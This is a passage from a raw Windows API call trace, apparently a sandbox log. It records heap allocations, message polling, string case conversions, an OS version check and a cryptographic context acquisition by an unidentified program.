Size=0x10) returned 0x24aaec0 [0189.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0189.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0189.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0189.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0189.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0189.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0189.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.413] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.414] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0189.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0189.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0189.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0189.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0189.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0189.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0189.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0189.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0189.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.415] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.415] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.415] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0189.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.415] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.416] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0189.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0189.416] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0189.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0189.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0189.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0189.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0189.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0189.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0189.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0189.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0189.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.418] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0189.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0189.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0189.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0189.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0189.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0189.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0189.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0189.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0189.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0189.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0189.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0189.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0189.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0189.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0189.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0189.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0189.420] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xaa3868) returned 1 [0189.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0189.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0189.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0189.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0189.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0189.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0189.421] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0189.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0189.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0189.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0189.421] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0189.422] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0189.422] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0189.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0189.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.422] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0189.422] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.422] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0189.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.422] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.422] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.422] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.422] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0189.423] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0189.423] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0189.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0189.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.423] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0189.423] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.423] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0189.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0189.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.423] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.423] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.424] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.424] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0189.424] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0189.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0189.424] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0189.424] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0189.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0189.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0189.424] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0189.424] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.424] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0189.425] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0189.425] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0189.425] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0189.425] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0189.425] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0189.425] CharUpperBuffW (in: lpsz="A5400102815", 